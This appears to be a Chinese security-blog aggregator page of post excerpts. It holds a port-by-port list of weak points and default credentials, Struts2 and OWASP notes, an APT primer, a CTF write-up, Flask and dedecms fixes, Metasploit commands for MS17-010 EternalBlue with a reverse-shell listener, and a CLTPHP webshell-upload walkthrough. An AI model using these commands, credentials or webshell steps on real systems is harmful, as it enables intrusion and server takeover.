漏洞

常见的端口漏洞利用弱点

旧城冷巷雨未停 提交于 2019-12-02 23:32:51
21 FTP 主要看是否支持匿名,也可跑弱口令 22 SSH 弱口令爆破 23 telnet 弱口令爆破 80-90 WEB 常见WEB 漏洞以及一些为管理后台 161 snmp public 弱口令 389 ldap 是否为匿名访问 443 openssl 心脏出血以及一些WEB 漏洞测试 445 smb 跑弱口令,检测是否有ms_08067 等溢出 873 rsync 是否为匿名访问,也可以跑弱口令 1025 RPC NFS 匿名访问 1099 java rmi 远程命令执行漏洞 1433 mssql 弱口令爆破 1521 oracle 弱口令爆破 2082/2083 cpanel主机管理系统登陆 弱口令爆破 2222 DA虚拟主机管理系统登陆 弱口令爆破 2601,2604 zebra路由器 默认密码zebra 3128 squid代理默认端口 如果没设置口令很可能 就直接漫游内网 3306 mysql 弱口令爆破 3312/3311 kangle主机管理系统登陆 说明 3389 RDP 弱口令爆破,SHIFT 后门,放大镜,输入法漏洞 4440 rundeck web 4848 GlassFish web 中间件 弱口令admin/adminadmin 5432 postgres 弱口令爆破 5560,7778 iSqlPlus 5900,5901,5902 vnc

Struts2系列漏洞起始篇

匿名 (未验证) 提交于 2019-12-02 23:32:01
前言 到目前位置struts2的漏洞编号已经到了S2-057,一直想系统的学习下Struts2的漏洞,但由于工作量较大,一直搁浅。最近由于工作需要,借此机会来填下坑。个人认为一个框架漏洞出来了仅仅看下别人分析的文章是远远不够,因为这些文章往往都只针对个别漏洞,可能框架中还存在类似的漏洞你依然发现不了。所以我说需要系统的学习下,从框架的源码开始分析它的工作流程(当然这里我会有所取舍,全部都讲没意义),同时这样也会加深自己对该框架的理解,之后如果一个新的漏洞出来了,你可以仅根据官方的公告或变动的代码很简单地还原整个漏洞,同时这样做对代码审计也会有一定的帮助。这是我struts2系列文章的第一篇,篇幅会比较长(实际上分析源码的地方我已经省了很多)。之后我还会写spring、tomcat等系列的漏洞分析文章。 准备工作 我使用的是eclipse+struts-core2.1.6,struts2的各版本是由些许区别的,但是大致流程都是相同的,这里采用较老的版本是因为S2早期的漏洞都可以在里面找到,方便分析。 Struts2的工作流程 在原生的jsp+servlet项目中,常用会到Filter过滤器来过滤一些参数等等,这里struts2就是将自己的核心过滤器配置在web.xml中,这样可以让指定的HTTP请求都经过Struts2。早期struts2的核心过滤器是FilterDispathcer

web前端笔记之Web前端的安全与漏洞

匿名 (未验证) 提交于 2019-12-02 23:32:01
http://www.owasp.org.cn/ 这个会不定时的更新,而且里面说例子和原理都挺全面的, 大家可以去这里看到最新的威胁排行 OWASP: 开放式Web应用程序安全项目(OWASP)是一个非营利组织,不附属于任何企业或财团。因此,由OWASP提供和开发的所有设施和文件都不受商业因素的影响。OWASP支持商业安全技术的合理使用,它有一个论坛,在论坛里信息技术专业人员可以发表和传授专业知识和技能。 什么是漏洞? 漏洞就是一个系统存在的弱点或者缺陷。 漏洞有可能是来自应用软件或者操作系统设计时的缺陷或者编码的时候产生的错误,也可能是来自于数据交互过程中设计的缺陷或者逻辑流程上的问题。这些漏洞有可能被有意或者无意的利用,从而造成一些意外的后果。比如信息泄露,资料被修改,系统被他人控制等等。 常见的一些漏洞 1.注入 其中最常见的就是SQL注入 SQL注入就是把一个SQL语句添加到用户输入的参数中,并且把这个参数发送到后台SQL服务器进行解析并执行。 2.XSS(跨站脚本攻击) 攻击者在网页中插入恶意代码,而网站对于用户输入内容未过滤,当用户浏览该页之时,页面中被插入的代码被执行,从而达到恶意攻击用户的特殊目的。 3.文件上传漏洞 文件上传漏洞是指用户上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力,这种攻击方式也是最直接和有效的,有的时候几乎不需要技术门槛。

MS17-010漏洞复现

匿名 (未验证) 提交于 2019-12-02 23:05:13
首先msfconsole的smb模块扫描,看看是否有漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.1.129 Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona rhost => 192.168.1.129 msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机 lhost => 192.168.1.132 msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 2000,个人认为) shell成功了

APT攻击基础科普

匿名 (未验证) 提交于 2019-12-02 23:03:14
0x00 APT的历史起源背景 APT通常是指一个组织,甚至可能一个政府支持下的组织,因为APT团体是一个既有能力也有意向持续而有效地进行攻击的实体。所以APT通常用来指网络威胁,特别是使用互联网进行间谍活动,利用各种情报搜集技术来获取敏感信息,但同样适用于诸如传统间谍活动或攻击等其他威胁。其他公认的攻击媒介包括受感染的媒体,供应链和社会工程。这些攻击的目的是将自定义的恶意代码放在一台或多台计算机上执行特定的任务,并在最长的时间内不被发现。了解攻击者文件(如文件名称)可帮助专业人员进行全网搜索,以收集所有受影响的系统。个人,如个人黑客,通常不被称为APT,因为即使他们意图获得或攻击特定目标,他们也很少拥有先进和持久的资源。 0x01 APT攻击定义 APT攻击(Advanced Persistent Threat,高级持续性威胁)是指组织(特别是政府)或者小团体利用当下先进的攻击手法对特定目标进行长期持续性的网络攻击。APT攻击的高级体现在于精确的信息收集、高度的隐蔽性、以及使用各种复杂的网络基础设施、应用程序漏洞对对目标进行的精准打击。攻击人员的攻击形式更为高级和先进,称为网络空间领域最高级别的安全对抗。APT是黑客以窃取核心资料为目的,针对客户所发动的网络攻击和侵袭行为。 APT(高级长期威胁)包含三个要素:高级、长期、威胁

NSCTF2015 逆向第五题分析

匿名 (未验证) 提交于 2019-12-02 22:56:40
这道题目我没有写出Exploit,因为编码时候里面几个细节处理出错。但对程序的逆向分析已完成,这里就学习一下别人写Exploit的思路。主要参考: 绿盟科技网络攻防赛资料下载 0x01 题目要求 题目要求如下: 1.找出Exploit.exe中的漏洞。简单分析漏洞的成因,包括漏洞类型、相关的反汇编或伪C代码以及说明信息等。 2.在开启DEP+ASLR的系统里运行Exploit.弹出计算器。 0x02 漏洞分析 首先脱掉ASPack壳,OEP如下: 使用IDA分析,发现这是一个Socket server程序,监听在2994端口。支持三个命令:ENCRYPT、STATUS和EXIT main函数中大都是Socket的逻辑代码,其中重点需要关注这2个函数:ShellExecuteA()和sub_401120()。 以下是sub_401120()函数主要代码: 观察发现,STATUS命令的处理中打印了内存地址,存在一处Information Leakage漏洞。 接下来分析ENCRYPT命令的处理逻辑,即sub_401120()函数,它主要调用sub_401030()函数,我们将其重命名为encrypt() encrypt()函数做了两件事,一是使用rand()函数产生一个随机字符数组keys,二是将传入数据与keys异或后拷贝给大小为200bytes的栈内存。

Flask 0.12.2版本包含安全漏洞,请考虑升级!

匿名 (未验证) 提交于 2019-12-02 22:11:45
这个漏洞( CVE-2018-1000656 )四天前(8月20号)被发布在NVD(National Vulnerability Database,国家漏洞数据库)上,漏洞描述如下: The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. 大致的翻译如下: Pallets项目组开发的Flask 0.12.3及以下版本包含CWE-20类型的漏洞:不合适的输入验证漏洞。这个漏洞将会导致大量内存占用,可能会导致拒绝服务。攻击者可以通过提供使用了错误编码的JSON数据来进行攻击。这个漏洞已经在0.12.3版本中修复( #2691 )。 应对措施

dedecms cookies泄漏导致SQL漏洞 inc_archives_functions.php 的解决方法

匿名 (未验证) 提交于 2019-12-02 22:11:45
1.打开\member\inc\inc_archives_functions.php文件,找到239行,将 替换为: 2.批量搜索"$formfields.$cfg_cookie_encode" 3.将 $formfields.$cfg_cookie_encode $formfields."dls6.com".$cfg_cookie_encode dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法 if (empty($dede_fieldshash) || $dede_fieldshash != md5($dede_addonfields.$cfg_cookie_encode)) 如图: 修改代码为: if (empty($dede_fieldshash) || ( $dede_fieldshash != md5($dede_addonfields . $cfg_cookie_encode) && $dede_fieldshash != md5($dede_addonfields . 'anythingelse' . $cfg_cookie_encode)) ) 文章来源: dedecms cookies泄漏导致SQL漏洞 inc_archives_functions.php 的解决方法

CLTPHP 漏洞

匿名 (未验证) 提交于 2019-12-02 22:11:45
awd小组的第一次训练 0x01 首先看一下主界面 使用的应该是PHP模板,随便翻一下找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接